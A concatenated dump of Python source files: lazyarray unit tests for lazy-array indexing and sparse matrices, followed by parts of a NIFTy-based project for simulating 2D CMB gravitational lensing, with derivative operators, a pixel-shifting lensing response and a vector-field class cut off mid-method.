a1 = 3 * np.ones((1, 1))
m2 = larray(3, shape=(1, 1, 1))
a2 = 3 * np.ones((1, 1, 1))
assert_equal(a[0], m[0])
assert_equal(a.shape, m.shape)
assert_equal(a[:].shape, m[:].shape)
assert_equal(a, m.evaluate())
assert_equal(a1.shape, m1.shape)
assert_equal(a1[0,:].shape, m1[0,:].shape)
assert_equal(a1[:].shape, m1[:].shape)
assert_equal(a1, m1.evaluate())
assert_equal(a2.shape, m2.shape)
assert_equal(a2[:, 0,:].shape, m2[:, 0,:].shape)
assert_equal(a2[:].shape, m2[:].shape)
assert_equal(a2, m2.evaluate())
def test_partially_evaluate_constant_array_with_boolean_index():
m = larray(3, shape=(4, 5))
a = 3 * np.ones((4, 5))
addr_bool = np.array([True, True, False, False, True])
addr_int = np.array([0, 1, 4])
assert_equal(a[::2, addr_bool].shape, a[::2, addr_int].shape)
assert_equal(a[::2, addr_int].shape, m[::2, addr_int].shape)
assert_equal(a[::2, addr_bool].shape, m[::2, addr_bool].shape)
def test_partially_evaluate_constant_array_with_all_boolean_indices_false():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.array([False, False, False])
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
def test_partially_evaluate_constant_array_with_only_one_boolean_indice_true():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.array([False, True, False])
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
assert_equal(m[addr_bool][0], a[0])
def test_partially_evaluate_constant_array_with_boolean_indice_as_random_valid_ndarray():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.random.rand(3) > 0.5
while not addr_bool.any():
# random array, but not [False, False, False]
addr_bool = np.random.rand(3) > 0.5
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
assert_equal(m[addr_bool][0], a[addr_bool][0])
def test_partially_evaluate_constant_array_size_one_with_boolean_index_true():
m = larray(3, shape=(1,))
a = np.array([3])
addr_bool = np.array([True])
m1 = larray(3, shape=(1, 1))
a1 = 3 * np.ones((1, 1))
addr_bool1 = np.array([[True]], ndmin=2)
assert_equal(m[addr_bool][0], a[0])
assert_equal(m[addr_bool], a[addr_bool])
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m1[addr_bool1][0], a1[addr_bool1][0])
assert_equal(m1[addr_bool1].shape, a1[addr_bool1].shape)
def test_partially_evaluate_constant_array_size_two_with_boolean_index_true():
m2 = larray(3, shape=(1, 2))
a2 = 3 * np.ones((1, 2))
addr_bool2 = np.ones((1, 2), dtype=bool)
assert_equal(m2[addr_bool2][0], a2[addr_bool2][0])
assert_equal(m2[addr_bool2].shape, a2[addr_bool2].shape)
def test_partially_evaluate_constant_array_size_one_with_boolean_index_false():
m = larray(3, shape=(1,))
m1 = larray(3, shape=(1, 1))
a = np.array([3])
a1 = np.array([[3]], ndmin=2)
addr_bool = np.array([False])
addr_bool1 = np.array([[False]], ndmin=2)
addr_bool2 = np.array([False])
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m1[addr_bool1].shape, a1[addr_bool1].shape)
def test_partially_evaluate_constant_array_size_with_empty_boolean_index():
m = larray(3, shape=(1,))
a = np.array([3])
addr_bool = np.array([], dtype='bool')
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m[addr_bool].shape, (0,))
def test_partially_evaluate_functional_array_with_boolean_index():
m = larray(lambda i, j: 5 * i + j, shape=(4, 5))
a = np.arange(20.0).reshape((4, 5))
addr_bool = np.array([True, True, False, False, True])
addr_int = np.array([0, 1, 4])
assert_equal(a[::2, addr_bool].shape, a[::2, addr_int].shape)
assert_equal(a[::2, addr_int].shape, m[::2, addr_int].shape)
assert_equal(a[::2, addr_bool].shape, m[::2, addr_bool].shape)
def test_getslice_with_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7, 3))
assert_array_equal(m[::2, (0, 2)],
np.arange(8).reshape((4, 2)))
def test_equality_with_lazyarray():
m1 = larray(42.0, shape=(4, 5)) / 23.0 + 2.0
m2 = larray(42.0, shape=(4, 5)) / 23.0 + 2.0
assert_equal(m1, m2)
def test_equality_with_number():
m1 = larray(42.0, shape=(4, 5))
m2 = larray([42, 42, 42])
m3 = larray([42, 42, 43])
m4 = larray(42.0, shape=(4, 5)) + 2
assert_equal(m1, 42.0)
assert_equal(m2, 42)
assert_not_equal(m3, 42)
assert_raises(Exception, m4.__eq__, 44.0)
def test_equality_with_array():
m1 = larray(42.0, shape=(4, 5))
target = 42.0 * np.ones((4, 5))
assert_raises(TypeError, m1.__eq__, target)
def test_deepcopy():
m1 = 3 * larray(lambda i, j: 5 * i + j, shape=(4, 5)) + 2
m2 = deepcopy(m1)
m1.shape = (3, 4)
m3 = deepcopy(m1)
assert_equal(m1.shape, m3.shape, (3, 4))
assert_equal(m2.shape, (4, 5))
assert_array_equal(m1.evaluate(), m3.evaluate())
def test_deepcopy_with_ufunc():
m1 = sqrt(larray([x ** 2 for x in range(5)]))
m2 = deepcopy(m1)
m1.base_value[0] = 49
assert_array_equal(m1.evaluate(), np.array([7, 1, 2, 3, 4]))
assert_array_equal(m2.evaluate(), np.array([0, 1, 2, 3, 4]))
def test_set_shape():
m = larray(42) + larray(lambda i: 3 * i)
assert_equal(m.shape, None)
m.shape = (5,)
assert_array_equal(m.evaluate(), np.array([42, 45, 48, 51, 54]))
def test_call():
A = larray(np.array([1, 2, 3]), shape=(3,)) - 1
B = 0.5 * larray(lambda i: 2 * i, shape=(3,))
C = B(A)
assert_array_equal(C.evaluate(), np.array([0, 1, 2]))
assert_array_equal(A.evaluate(), np.array([0, 1, 2])) # A should be unchanged
def test_call2():
positions = np.array(
[[0., 2., 4., 6., 8.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]])
def position_generator(i):
return positions.T[i]
def distances(A, B):
d = A - B
d **= 2
d = np.sum(d, axis=-1)
np.sqrt(d, d)
return d
def distance_generator(f, g):
def distance_map(i, j):
return distances(f(i), g(j))
return distance_map
distance_map = larray(distance_generator(position_generator, position_generator),
shape=(4, 5))
f_delay = 1000 * larray(lambda d: 0.1 * (1 + d), shape=(4, 5))
assert_array_almost_equal(
f_delay(distance_map).evaluate(),
np.array([[100, 300, 500, 700, 900],
[300, 100, 300, 500, 700],
[500, 300, 100, 300, 500],
[700, 500, 300, 100, 300]], dtype=float),
decimal=12)
# repeat, should be idempotent
assert_array_almost_equal(
f_delay(distance_map).evaluate(),
np.array([[100, 300, 500, 700, 900],
[300, 100, 300, 500, 700],
[500, 300, 100, 300, 500],
[700, 500, 300, 100, 300]], dtype=float),
decimal=12)
def test__issue4():
# In order to avoid the errors associated with version changes of numpy, mask1 and mask2 no longer contain boolean values but integer values
a = np.arange(12).reshape((4, 3))
b = larray(np.arange(12).reshape((4, 3)))
mask1 = (slice(None), int(True))
mask2 = (slice(None), np.array([int(True)]))
assert_equal(b[mask1].shape, partial_shape(mask1, b.shape), a[mask1].shape)
assert_equal(b[mask2].shape, partial_shape(mask2, b.shape), a[mask2].shape)
def test__issue3():
a = np.arange(12).reshape((4, 3))
b = larray(a)
c = larray(lambda i, j: 3*i + j, shape=(4, 3))
assert_array_equal(a[(1, 3), :][:, (0, 2)], b[(1, 3), :][:, (0, 2)])
assert_array_equal(b[(1, 3), :][:, (0, 2)], c[(1, 3), :][:, (0, 2)])
assert_array_equal(a[(1, 3), (0, 2)], b[(1, 3), (0, 2)])
assert_array_equal(b[(1, 3), (0, 2)], c[(1, 3), (0, 2)])
def test_partial_shape():
a = np.arange(12).reshape((4, 3))
test_cases = [
(slice(None), (4, 3)),
((slice(None), slice(None)), (4, 3)),
(slice(1, None, 2), (2, 3)),
(1, (3,)),
((1, slice(None)), (3,)),
([0, 2, 3], (3, 3)),
(np.array([0, 2, 3]), (3, 3)),
((np.array([0, 2, 3]), slice(None)), (3, 3)),
(np.array([True, False, True, True]), (3, 3)),
#(np.array([True, False]), (1, 3)), # not valid with NumPy 1.13
(np.array([[True, False, False], [False, False, False], [True, True, False], [False, True, False]]), (4,)),
#(np.array([[True, False, False], [False, False, False], [True, True, False]]), (3,)), # not valid with NumPy 1.13
((3, 1), tuple()),
((slice(None), 1), (4,)),
((slice(None), slice(1, None, 3)), (4, 1)),
((np.array([0, 3]), 2), (2,)),
((np.array([0, 3]), np.array([1, 2])), (2,)),
((slice(None), np.array([2])), (4, 1)),
(((1, 3), (0, 2)), (2,)),
(np.array([], bool), (0, 3)),
]
for mask, expected_shape in test_cases:
assert_equal(partial_shape(mask, a.shape), a[mask].shape)
assert_equal(partial_shape(mask, a.shape), expected_shape)
b = np.arange(5)
test_cases = [
(np.arange(5), (5,))
]
for mask, expected_shape in test_cases:
assert_equal(partial_shape(mask, b.shape), b[mask].shape)
assert_equal(partial_shape(mask, b.shape), expected_shape)
def test_is_homogeneous():
m0 = larray(10, shape=(5,))
m1 = larray(np.arange(1, 6))
m2 = m0 + m1
m3 = 9 + m0 / m1
assert m0.is_homogeneous
assert not m1.is_homogeneous
assert not m2.is_homogeneous
assert not m3.is_homogeneous
```
#### File: lazyarray/test/test_lazy_arrays_from_Sparse_Matrices.py
```python
import numpy as np
from lazyarray import larray
from scipy import sparse
import random
################
# Random numbers
################
i = random.randint(-100, 100)
j = random.randint(-100, 100)
k = random.randint(-100, 100)
l = random.randint(-100, 100)
m = random.randint(-100, 100)
n = random.randint(-100, 100)
p = random.randint(-100, 100)
q = random.randint(-100, 100)
r = random.randint(-100, 100)
################
# An example
################
#i = 1
#j = 2
#k = 0
#l = 0
#m = 0
#n = 3
#p = 1
#q = 0
#r = 4
#print "i =", i
#print "j =", j
#print "k =", k
#print "l =", l
#print "m =", m
#print "n =", n
#print "p =", p
#print "q =", q
#print "r =", r
##############################################################
# Definition of an array
##############################################################
def test_function_array_general():
A = np.array([[i, j, k], [l, m, n], [p, q, r]])
#print "A ="
#print A
return A
##############################################################
# Definition of 7 sparse matrices
##############################################################
def sparse_csc_matrices():
csc = sparse.csc_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "csc matrices ="
#print csc
return csc
def sparse_csr_matrices():
csr = sparse.csr_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "csr matrices ="
#print csr
return csr
def sparse_bsr_matrices():
bsr = sparse.bsr_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "bsr matrices ="
#print bsr
return bsr
def sparse_lil_matrices():
lil = sparse.lil_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "lil matrices ="
#print lil
return lil
def sparse_dok_matrices():
dok = sparse.dok_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "dok matrices ="
#print dok
return dok
def sparse_coo_matrices():
coo = sparse.coo_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "coo matrices ="
#print coo
return coo
def sparse_dia_matrices():
dia = sparse.dia_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "dia matrices ="
#print dia
return dia
if __name__ == "__main__":
##############################################################
# Call test_function_array_general
# Create a sparse matrix from array
# There are 7 sparse matrices
##############################################################
#print "Array general ="
test_function_array_general()
#print "Array ="
#print test_function_array_general()
# print "----"
# print "Sparse array csc general ="
sA_csc_general = sparse.csc_matrix(test_function_array_general())
#print ("sparse csc matrices", sparse.csc_matrix(test_function_array_general()))
#print "sparse csc matrices ="
#print sA_csc_general
# print "----"
# print "Sparse array csr general ="
sA_csr = sparse.csr_matrix(test_function_array_general())
#print ("sparse csr matrices", sparse.csr_matrix(test_function_array_general()))
#print "sparse csr matrices ="
#print sA_csr
# print "----"
# print "Sparse array bsr general ="
sA_bsr = sparse.bsr_matrix(test_function_array_general())
# print ("sparse bsr matrices", sparse.bsr_matrix(test_function_array_general()))
# print "sparse bsr matrices ="
# print sA_bsr
# print "----"
# print "Sparse array lil general ="
sA_lil = sparse.lil_matrix(test_function_array_general())
# print ("sparse lil matrices", sparse.lil_matrix(test_function_array_general()))
# print "sparse lil matrices ="
# print sA_lil
# print "----"
# print "Sparse array dok general ="
sA_dok = sparse.dok_matrix(test_function_array_general())
# print ("sparse dok matrices", sparse.dok_matrix(test_function_array_general()))
# print "sparse dok matrices ="
# print sA_dok
# print "----"
# print "Sparse array coo general ="
sA_coo = sparse.coo_matrix(test_function_array_general())
# print ("sparse coo matrices", sparse.coo_matrix(test_function_array_general()))
# print "sparse coo matrices ="
# print sA_coo
# print "----"
# print "Sparse array dia general ="
sA_dia = sparse.dia_matrix(test_function_array_general())
# print ("sparse dia matrices", sparse.dia_matrix(test_function_array_general()))
# print "sparse dia matrices ="
# print sA_dia
#print "----------------------------------------------------------------------"
##############################################################
# Call the sparse matrices
# Create a lazy array from sparse matrices
##############################################################
Array_csc_matrices = sparse_csc_matrices().toarray()
#print "Array csc matrices ="
#print Array_csc_matrices
Array_csr_matrices = sparse_csr_matrices().toarray()
#print "Array csr matrices ="
#print Array_csr_matrices
Array_bsr_matrices = sparse_bsr_matrices().toarray()
#print "Array bsr matrices ="
#print Array_bsr_matrices
Array_lil_matrices = sparse_lil_matrices().toarray()
#print "Array lil matrices ="
#print Array_lil_matrices
Array_dok_matrices = sparse_dok_matrices().toarray()
#print "Array dok matrices ="
#print Array_dok_matrices
Array_coo_matrices = sparse_coo_matrices().toarray()
#print "Array coo matrices ="
#print Array_coo_matrices
Array_dia_matrices = sparse_dia_matrices().toarray()
#print "Array dia matrices ="
#print Array_dia_matrices
``` |
{
"source": "jpbreuer/CMB-2D-grav_lensing-with-nifty",
"score": 3
} |
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/derivatives.py
```python
from vector_field import *
about.hermitianize.off()
def Nabla_discrete(k_space,s_space=None,kfield=None):
"""
This function returns the difference operator represented in Fourier
space.
"""
if(about.hermitianize.status):
print 'It is not recommended to calculate derivatives in'
print 'Fourier space while hermitianize is on.'
print 'Please type \'about.hermitianize.off()\' to switch off hermitianization. '
if(kfield is None):
kfield = position_field(k_space)
if(s_space is None):
s_space = k_space.get_codomain()
Ndim = k_space.naxes()
basis_vectors = [np.zeros(Ndim) for ii in range(Ndim) ]
for ii in range(Ndim):
basis_vectors[ii][ii] = s_space.vol[ii]
Nabla = [exp((0.+1.j)*2*pi*kfield.vec_dot(basis_vectors[ii]))-1. for ii in range(Ndim)]
val = np.array([Nabla[ii].val/s_space.vol[ii] for ii in range(len(s_space.vol))])
Nabla = vector_field(k_space,Ndim=k_space.naxes(),target=s_space,val=val)
return Nabla
def Nabla_continuous(k_space,s_space=None,kfield=None):
"""
This function returns the differential operator represented in Fourier
space.
i 2 \pi \vec{k}
"""
if(about.hermitianize.status):
print 'It is not recommended to calculate derivatives in'
print 'Fourier space while hermitianize is on.'
print 'Please type \'about.hermitianize.off()\' to switch off hermitianization. '
if(kfield is None):
kfield = position_field(k_space)
if(s_space is None):
s_space = k_space.get_codomain()
Nabla = (0.+1.j)*2*pi*kfield
return Nabla
def curl(x,Nabla):
"""
This function returns the curl of a field x.
x needs to be a vector field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla.cross(x.transform())).transform()
def div(x,Nabla):
"""
This function returns the divergence of a field x.
x needs to be a vector field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla.vec_dot(x.transform())).transform()
def grad(x,Nabla):
"""
This function returns the gradient of a field x.
x needs to be a scalar field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla*(x.transform())).transform()
```
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/FlatLensingResponse.py
```python
from __future__ import division
from nifty import *
#--- For Maksim's Derivatives Implementation --->
from vector_field import *
from derivatives import *
#--- Other --->
note = notification()
#--- CMB Lensing Response --->
class LensingResponse(response_operator):
def __init__(self, config, lensing_potential=None):
"""
Parameters
-----------
lensing_potential : field | default = None
default takes a fixed and explicit potential
otherwise, takes a power spectrum from the config as input,
and creates a realisation of a potential from it
"""
#@profile
if (not isinstance (config.domain, space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = config.domain
self.target = config.domain
self.pixels = config.pixels
self.codomain = config.codomain
self.distance = config.distance
self.path = config.path
self.test = config.test
self.NFW_profile = config.NFW_profile
self.sym = False
self.uni = False
self.imp = True
#--- From test --->
if (self.test == True):
self.testlensing_potential = config.testlensing_potential
if (self.testlensing_potential.domain.fourier == False):
self.lensing_potential = self.testlensing_potential.transform()
# print(self.lensing_potential.domain)
print("Test case activated!")
else:
#--- Default explicit --->
if (self.NFW_profile == True):
self.lensing_potential = config.lensing_potential.transform()
if (self.lensing_potential.domain.fourier == False):
self.lensing_potential = self.lensing_potential.transform()
print("R-Operator: Lensing Potential in rg-space was passed")
else:
if (lensing_potential == None): # Takes a fixed and explicit potential
self.lensing_potential = config.C_Psi.get_random_field(domain = config.codomain, target = config.domain)
if (self.lensing_potential.domain.fourier == False):
self.lensing_potential = self.lensing_potential.transform()
# print(self.lensing_potential.domain)
print("R-Operator: Lensing Potential was created")
#--- Gradient --->
self.gradient_x = self.gradientfield(self.lensing_potential)[0]
self.gradient_y = self.gradientfield(self.lensing_potential)[1]
# print("A_x")
# print(self.gradient_x)
# print("B_y")
# print(self.gradient_y)
#--- Delta X --->
self.xshift = self.pix2shift(self.gradient_x)[0]
# print("DeltaX: ")
# print(self.xshift)
#--- Transform X --->
self.xposition = self.pix2shift(self.gradient_x)[1]
# print("PositionX: ")
# print(self.xposition)
#--- Delta Y --->
self.yshift = self.pix2shift(self.gradient_y)[0]
# print("DeltaY: ")
# print(self.yshift)
#--- Transform Y --->
self.yposition = self.pix2shift(self.gradient_y)[2]
# print("PositionY: ")
# print(self.yposition)
def pix2shift(self, field):
"""
Parameters
-----------
field : array
Takes a field or gradient field
Function then rounds values to appropriate pixel,
returns the delta coordinates of the given field,
then returns the positions of x and y
"""
#--- Get Dimensions --->
pixels = field.shape[0]
#--- For Delta --->
deltashift = np.round(field / self.distance).astype(float)
# print("Delta: ")
# print(field/self.distance)
#--- Adjust Boundary Conditions for Delta --->
pixelshift = deltashift / pixels # Number of times looped through grid.float becomes where pixel goes to
pixelshiftint = pixelshift.astype(int)
deltashift = (pixelshift - pixelshiftint) * pixels
# deltashift[deltashift < 0] += pixels # adjust for negative values
deltashift = deltashift.astype(float)
#--- Define Empty Array --->
zeroarray = np.zeros(shape = (deltashift.shape)).astype(float)
#--- For X --->
xarray = np.array(range(pixels)).astype(float)
xpositions = zeroarray + xarray[None,:]
newx = deltashift + xpositions
#--- Boundary Conditions --->
newx[newx < 0] += pixels
newx[newx >= pixels] -= pixels
#print(newx)
#--- For Y --->
yarray = np.array(range(pixels)).astype(float)
ypositions = zeroarray + yarray[:,None]
newy = deltashift + ypositions
# print("Before")
# print(newy)
#--- Boundary Conditions --->
newy[newy < 0] += pixels
newy[newy >= pixels] -= pixels
# print("After")
# print(newy)
return deltashift, newx, newy
def gradientfield(self, field):
"""
Parameters
-----------
field : array
Takes any given field
Function then calculates the discrete or continuous gradient field using Maksim's implementation
see 'derivatives.py'
"""
#--- Nabla Operator --->
# p = position_field(self.domain)
# print("P", p.val)
##test for Ripple effect
# deri_cont = Nabla_continuous(self.codomain) #The Fourier transform of the continuous derivative
deri_disc = Nabla_discrete(self.codomain) #The Fourier transform of the discrete derivative
#--- Compute Gradient Field --->
#--- SUPER IMPORTANT ---> !!!!!
gradient = (deri_disc * field).transform()
# gradient = (deri_disc * field.transform()).transform()
#--- Compute Divergence
# divergence = (deri_cont.vec_dot(a.transform())).transform()
# print("Divergence_a: ", div(a,deri_cont)) #divergence of a
#--- Compute Curl --->
# curl = (deri_cont.cross(a.transform())).transform()
# print("Curl_a: ", curl(a,deri_cont)) #curl of a
return gradient
def _multiply(self, x, **kwargs):
"""
Parameters
-----------
x : array
takes signal as input
this is the pixel shifting function, returns the LensedField
d = R(s)
"""
self.lensed = np.zeros(shape = (self.pixels, self.pixels)).astype(float)
for i in np.arange(self.pixels):
for j in np.arange(self.pixels):
self.lensed[i][j] = x[self.yposition[i][j]][self.xposition[i][j]]
# print("Lensed Field: ")
# print(self.lensed.astype(float))
LensedField = field(self.domain, val = self.lensed)
# LensedField.plot(power = False)
return LensedField
def _adjoint_multiply(self, x, **kwargs):
"""
Parameters
-----------
x : array
takes data as input
this is an adjoint function that replaces the changes from the original field to zeros (loss of data)
s_hat = R_dagger(d)
the function also sums pixels that are shifted to the same location
if s(alpha) = s_hat(beta):
then d(alpha) + d(beta)
"""
adjointlensed = np.zeros(shape = (self.pixels, self.pixels)).astype(float)
for i in np.arange(self.pixels):
for j in np.arange(self.pixels):
# Either if statement or "+=" in the else: statement
# if (adjointlensed[self.yposition[i][j]][self.xposition[i][j]] == x[self.yposition[i][j]][self.xposition[i][j]]):
# adjointlensed[self.yposition[i][j]][self.xposition[i][j]] = self.lensed[i][j] + x[i][j]
# else:
adjointlensed[self.yposition[i][j]][self.xposition[i][j]] += x[i][j]
# print("AdjointLensed: ")
# print(adjointlensed.astype(float))
AdjointLensedField = field(self.domain, val=adjointlensed)
# RevLensedField.plot(power = False)
return AdjointLensedField
```
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/vector_field.py
```python
from nifty import *
class vector_field(field):
def __init__(self,domain,Ndim=None,target=None,val=None,domain_explicit=False,**kwargs):
if(domain_explicit):
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = domain
## check codomain
if(target is None):
target = domain.get_codomain()
else:
self.domain.check_codomain(target)
self.target = target
else:
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
if(Ndim is None):
Ndim = domain.naxes()
self.domain = nested_space([point_space(Ndim),domain])
## check codomain
if(target is None):
target = domain.get_codomain()
else:
domain.check_codomain(target)
self.target = nested_space([self.domain.nest[0],target])
if(val is None):
vals = self.domain.nest[1].get_random_values(codomain=self.target.nest[1],**kwargs)
self.val = np.expand_dims(vals,0)
for ii in range(1,Ndim):
vals = self.domain.nest[1].get_random_values(codomain=self.target.nest[1],**kwargs)
vals = np.expand_dims(vals,0)
self.val = np.append(self.val,vals,axis=0)
else: self.val = self.domain.enforce_values(val,extend=True)
def transform(self,target=None,**kwargs):
if(not(target is None)):
target_domain = nested_space([self.target.nest[0],target])
res = super(vector_field,self).transform(target=target,overwrite=False,**kwargs)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def power(self,**kwargs):
if("codomain" in kwargs):
kwargs.__delitem__("codomain")
pp = self.domain.nest[1].calc_power(self.val[0],codomain=self.target.nest[1],**kwargs)
for ii in range(1,self.Ndim()):
pp += self.domain.nest[1].calc_power(self.val[ii],codomain=self.target.nest[1],**kwargs)
return pp
def __pos__(self):
return vector_field(self.domain,val=+self.val,target=self.target,domain_explicit=True)
def __neg__(self):
return vector_field(self.domain,val=-self.val,target=self.target,domain_explicit=True)
def __abs__(self):
if(np.iscomplexobj(self.val)):
return np.absolute(self.val)
else:
return vector_field(self.domain,val=np.absolute(self.val),target=self.target,domain_explicit=True)
def cross(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
return vector_field(x.domain,target=x.target,domain_explicit=True,val=np.cross(self.val.astype(x.domain.datatype),x.val,axis=0))
else:
return vector_field(self.domain,target=self.target,domain_explicit=True,val=np.cross(self.val,x.val.astype(self.domain.datatype),axis=0))
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=np.cross(self.val,x,axis=0))
def vec_dot(self,x):
if(isinstance(x,field)):
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
elif(isinstance(x,np.ndarray)):
if(x.shape == (self.Ndim(),)):
res = self.component(0)*x[0]
for ii in range(1,self.Ndim()):
res += self.component(ii)*x[ii]
return res
else:
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
else:
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
def vec_mul(self,x):
if(isinstance(x,field)):
if(self.domain.nest[0]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
val = np.array([self.val.astype(x.domain.datatype)[iii]*x.val[iii] for iii in range(len(x.val))])
return vector_field(nested_space([x.domain,self.domain.nest[1]]),target=nested_space([x.domain.get_codomain(),self.target.nest[1]]),domain_explicit=True,val=val)
else:
val = np.array([self.val[iii]*x.val.astype(self.domain.datatype)[iii] for iii in range(len(x.val))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
elif(isinstance(x,np.ndarray)):
if(x.shape==(self.Ndim(),)):
val = np.array([self.val[iii]*x.astype(self.domain.datatype)[iii] for iii in range(len(x))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
return self.__mul__(x)
else:
return self.__mul__(x)
def vec_div(self,x):
if(isinstance(x,field)):
if(self.domain.nest[0]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
val = np.array([self.val.astype(x.domain.datatype)[iii]/x.val[iii] for iii in range(len(x.val))])
return vector_field(nested_space([x.domain,self.domain.nest[1]]),target=nested_space([x.domain.get_codomain(),self.target.nest[1]]),domain_explicit=True,val=val)
else:
val = np.array([self.val[iii]/x.val.astype(self.domain.datatype)[iii] for iii in range(len(x.val))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
elif(isinstance(x,np.ndarray)):
if(x.shape==(self.Ndim(),)):
val = np.array([self.val[iii]/x.astype(self.domain.datatype)[iii] for iii in range(len(x))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
return self.__div__(x)
else:
return self.__div__(x)
def __mul__(self,x): ## __mul__ : self * x
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__mul__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)*x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val*x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val*res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__rmul__ = __mul__ ## __rmul__ : x * self
def __imul__(self,x): ## __imul__ : self *= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val *= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val *= x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val *= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val *= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val *= x
return self
def __div__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__div__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)/x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val/x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val/res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__truediv__ = __div__
def __rdiv__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__rdiv__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = x.val/self.val.astype(x.domain.datatype)
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = x.val.astype(self.domain.datatype)/self.val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = res_val/self.val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__rtruediv__ = __rdiv__
def __idiv__(self,x): ## __idiv__ : self /= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val /= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val /= x.val.astype(self.domain.datatype)
